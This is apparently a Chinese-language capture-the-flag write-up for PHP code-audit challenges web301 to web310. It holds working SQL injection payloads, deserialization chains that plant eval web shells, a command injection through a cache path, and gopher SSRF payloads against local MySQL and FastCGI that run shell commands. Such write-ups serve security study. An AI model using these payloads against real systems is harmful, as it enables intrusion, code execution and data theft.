web301
直接把源码下载下来
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
$_SESSION['error']="1";
header("location:login.php");
return;
}
if(!strcasecmp($userpwd,$row['sds_password'])){
$_SESSION['login']=1;
$result->free();
$mysqli->close();
header("location:index.php");
return;
}
没有防护的sql注入,可以直接拿sqlmap跑,但是这里直接分析,要登录上去就要满足
if(!strcasecmp($userpwd,$row['sds_password']))
$row['sds_password']利用sql语句也是可控的,所以payload
userid=-1' union select 1%23&userpwd=1
我的hackbar拉垮了,只能burp
web302
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
function sds_decode($str){
return md5(md5($str.md5(base64_encode("sds")))."sds");
}
唯一修改的地方,其实就是让联合注入查出来的值等于post传的值经过sds_decode()函数处理就可以了。
userid=-1' union select 'd9c77c4e454869d5d8da3b4be79694d3'%23&userpwd=1
web303
在dptadd.php中找到了注入点,不过看样子点全在登陆上去后的功能页面,能不能用上两关的方法登陆上去呢
$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
check.php里发现了
if(strlen($username)>6){
die();
}
发现了一个.sql,里面存在一个(甚至解不出来,admin:admin),直接登陆成功
INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');
在新增里保存抓包后直接替换全部内容,当然这几个位置都可以查
查表
dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())%23
查列
dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')%23
查数据
dpt_name=1',sds_address =(select flag from sds_fl9g)%23
web304
增加了个waf,但是感觉用处好像并不是很大
function sds_waf($str){
return preg_match('/[0-9]|[a-z]|-/i', $str);
}
表名改成了, sds_flaag,其他还是一样
web305
在checklogin.php中存在反序列化的点
if(isset($user_cookie)){
$user = unserialize($user_cookie);
}
又在class.php中发现
class user{
public $username;
public $password;
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function __destruct(){
file_put_contents($this->username, $this->password);
}
}
所以在login页面登陆抓包,增加user
<?php
class user{
public $username;
public $password;
public function __construct($u='',$p=''){
$this->username='./a.php';
$this->password='<?php eval($_POST[qwer]); ?>';
}
}
echo urlencode(serialize(new user()));
?>
user=O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22.%2Fa.php%22%3Bs%3A8%3A%22password%22%3Bs%3A28%3A%22%3C%3Fphp+eval%28%24_POST%5Bqwer%5D%29%3B+%3F%3E%22%3B%7D
随后利用蚁剑连接,这里要添加body信息
连接成功后再连接数据库,这里的密码在conn.php中找到
或者直接在a.php页面进行命令执行
qwer=include("conn.php");$sql="select flag from sds_flabag";$result=$mysqli->query($sql);$row=$result->fetch_array(MYSQLI_BOTH);var_dump($row);
web306
mvc结构的代码,class.php、dao.php、index.php看一下就可以了
class.php
class log{
public $title='log.txt';
public $info='';
public function loginfo($info){
$this->info=$this->info.$info;
}
public function close(){
file_put_contents($this->title, $this->info);
}
}
dao.php
public function __destruct(){
$this->conn->close();
}
index.php
<?php
session_start();
require "conn.php";
require "dao.php";
$user = unserialize(base64_decode($_COOKIE['user']));
index.php那里require了dao.php,而dao.php又require了class.php,所以随意抓包,修改index.php的user=
<?php
class dao{
private $conn;
public function __construct(){
$this->conn=new log();
}
}
class log{
public $title='1.php';
public $info='<?php @eval($_POST[a]); ?>';
}
$a = new dao();
echo base64_encode(serialize($a));
TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI2OiI8P3BocCBAZXZhbCgkX1BPU1RbYV0pOyA/PiI7fX0=
蚁剑连接直接找到flag
web307
找到两个存在能够执行的函数
dao.php中
public function clearCache(){
shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
}
class.php中
public function closelog(){
file_put_contents($this->title, $this->info);
}
但这里closelog好像并没有被用到,反而clearCache在logout.php中便有用到,所以这里只需要改一下cache_dir的内容即可,cache_dir在config.php里
logout.php
$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
$service->clearCache();
}
config.php
public $cache_dir = 'cache';
<?php
class config{
public $cache_dir = 'cache/*;cat /var/www/html/flag.php > /var/www/html/1.txt;';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo base64_encode(serialize($a));
?>
TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NTc6ImNhY2hlLyo7Y2F0IC92YXIvd3d3L2h0bWwvZmxhZy5waHAgPiAvdmFyL3d3dy9odG1sLzEudHh0OyI7fX0=
web308
增加了过滤,只允许字母存在,
public function clearCache(){
if(preg_match('/^[a-z]+$/i', $this->config->cache_dir)){
shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
}
在dao.php中发现了新的checkUpdate在fun.php找到对应function,在index.php中找到了利用它的地方
dao.php
public function checkVersion(){
return checkUpdate($this->config->update_url);
}
fun.php
function checkUpdate($url){
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
index.php
if($service){
$lastVersion=$service->checkVersion();
}
最后在config.php中,发现mysql数据库无密码,网址可控
<?php
class config{
private $mysql_username='root';
private $mysql_password='';
private $mysql_db='sds';
private $mysql_port=3306;
private $mysql_host='localhost';
public $cache_dir = 'cache';
public $update_url = 'https://vip.ctf.show/version.txt';
因此用gopherus生成payload
root
select "<?php eval($_POST[a]);?>" into outfile "/var/www/html/1.php"
<?php
class config
{
public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%61%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%01%00%00%00%01';
}
class dao
{
private $config;
public function __construct()
{
$this->config = new config();
}
}
$a = new dao();
echo base64_encode(serialize($a));
?>
TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czo3NjA6ImdvcGhlcjovLzEyNy4wLjAuMTozMzA2L18lYTMlMDAlMDAlMDElODUlYTYlZmYlMDElMDAlMDAlMDAlMDElMjElMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlNzIlNmYlNmYlNzQlMDAlMDAlNmQlNzklNzMlNzElNmMlNWYlNmUlNjElNzQlNjklNzYlNjUlNWYlNzAlNjElNzMlNzMlNzclNmYlNzIlNjQlMDAlNjYlMDMlNWYlNmYlNzMlMDUlNGMlNjklNmUlNzUlNzglMGMlNWYlNjMlNmMlNjklNjUlNmUlNzQlNWYlNmUlNjElNmQlNjUlMDglNmMlNjklNjIlNmQlNzklNzMlNzElNmMlMDQlNWYlNzAlNjklNjQlMDUlMzIlMzclMzIlMzUlMzUlMGYlNWYlNjMlNmMlNjklNjUlNmUlNzQlNWYlNzYlNjUlNzIlNzMlNjklNmYlNmUlMDYlMzUlMmUlMzclMmUlMzIlMzIlMDklNWYlNzAlNmMlNjElNzQlNjYlNmYlNzIlNmQlMDYlNzglMzglMzYlNWYlMzYlMzQlMGMlNzAlNzIlNmYlNjclNzIlNjElNmQlNWYlNmUlNjElNmQlNjUlMDUlNmQlNzklNzMlNzElNmMlNDUlMDAlMDAlMDAlMDMlNzMlNjUlNmMlNjUlNjMlNzQlMjAlMjIlM2MlM2YlNzAlNjglNzAlMjAlNjUlNzYlNjElNmMlMjglMjQlNWYlNTAlNGYlNTMlNTQlNWIlNjElNWQlMjklM2IlM2YlM2UlMjIlMjAlNjklNmUlNzQlNmYlMjAlNmYlNzUlNzQlNjYlNjklNmMlNjUlMjAlMjIlMmYlNzYlNjElNzIlMmYlNzclNzclNzclMmYlNjglNzQlNmQlNmMlMmYlMzElMmUlNzAlNjglNzAlMjIlMDElMDAlMDAlMDAlMDEiO319
web309
打的不是mysql了,打的是fastcgi.探测是通过gopher协议的延迟判断的
gopher://127.0.0.1:9000
<?php
class config
{
public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH72%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00H%04%00%3C%3Fphp%20system%28%27cat%20/var/www/html/f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao
{
private $config;
public function __construct()
{
$this->config = new config();
}
}
$a = new dao();
echo base64_encode(serialize($a));
?>
TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czo1OTU6ImdvcGhlcjovLzEyNy4wLjAuMTo5MDAwL18lMDElMDElMDAlMDElMDAlMDglMDAlMDAlMDAlMDElMDAlMDAlMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDElMDQlMDQlMDAlMEYlMTBTRVJWRVJfU09GVFdBUkVnbyUyMC8lMjBmY2dpY2xpZW50JTIwJTBCJTA5UkVNT1RFX0FERFIxMjcuMC4wLjElMEYlMDhTRVJWRVJfUFJPVE9DT0xIVFRQLzEuMSUwRSUwMkNPTlRFTlRfTEVOR1RINzIlMEUlMDRSRVFVRVNUX01FVEhPRFBPU1QlMDlLUEhQX1ZBTFVFYWxsb3dfdXJsX2luY2x1ZGUlMjAlM0QlMjBPbiUwQWRpc2FibGVfZnVuY3Rpb25zJTIwJTNEJTIwJTBBYXV0b19wcmVwZW5kX2ZpbGUlMjAlM0QlMjBwaHAlM0EvL2lucHV0JTBGJTE3U0NSSVBUX0ZJTEVOQU1FL3Zhci93d3cvaHRtbC9pbmRleC5waHAlMEQlMDFET0NVTUVOVF9ST09ULyUwMCUwMCUwMCUwMCUwMSUwNCUwMCUwMSUwMCUwMCUwMCUwMCUwMSUwNSUwMCUwMSUwMEglMDQlMDAlM0MlM0ZwaHAlMjBzeXN0ZW0lMjglMjdjYXQlMjAvdmFyL3d3dy9odG1sL2YlMkElMjclMjklM0JkaWUlMjglMjctLS0tLU1hZGUtYnktU3B5RDNyLS0tLS0lMEElMjclMjklM0IlM0YlM0UlMDAlMDAlMDAlMDAiO319
web310
用上一关的方法不行,先读取配置文件
<?php
class config{
public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo base64_encode(serialize($a));
?>
得到信息,存在flag,直接访问
server {
listen 4476;
server_name localhost;
root /var/flag;
index index.html;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
<?php
class config{
public $update_url = 'http://127.0.0.1:4476';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo base64_encode(serialize($a));
?>
TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyMToiaHR0cDovLzEyNy4wLjAuMTo0NDc2Ijt9fQ==
